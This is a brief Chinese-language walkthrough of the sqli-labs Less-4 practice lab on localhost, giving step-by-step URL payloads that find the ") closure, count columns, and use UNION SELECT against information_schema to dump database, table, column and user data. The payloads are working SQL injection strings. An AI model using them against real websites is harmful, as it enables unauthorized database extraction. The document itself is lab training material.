一、输入id,显示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1
二、判断是闭合方式(因为题目说明了字符注入,则省略判断数字型步骤)
1.输入单引号,页面正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1'
2.输入双引号,页面报错
http://127.0.0.1/sqli-labs-master/Less-4/?id=1"
3.由于双引号报错,则在双引号后添加注释符,页面报错
http://127.0.0.1/sqli-labs-master/Less-4/?id=1"--+
4.由于3报错,尝试添加括号,页面正常,则闭合方式为 ")
http://127.0.0.1/sqli-labs-master/Less-4/?id=1")--+
三、判断字段数,字段数为3,页面显示正常
http://127.0.0.1/sqli-labs-master/Less-4/?id=1") order by 3--+
四、判断显示位
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,2,3--+
五、爆所有数据库
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
六、爆指定数据库(security)的所有表
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+
七、爆指定表(users)的所有列
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3--+
八、爆指定列(id)的所有数据
http://127.0.0.1/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(id) from users),3--+
over~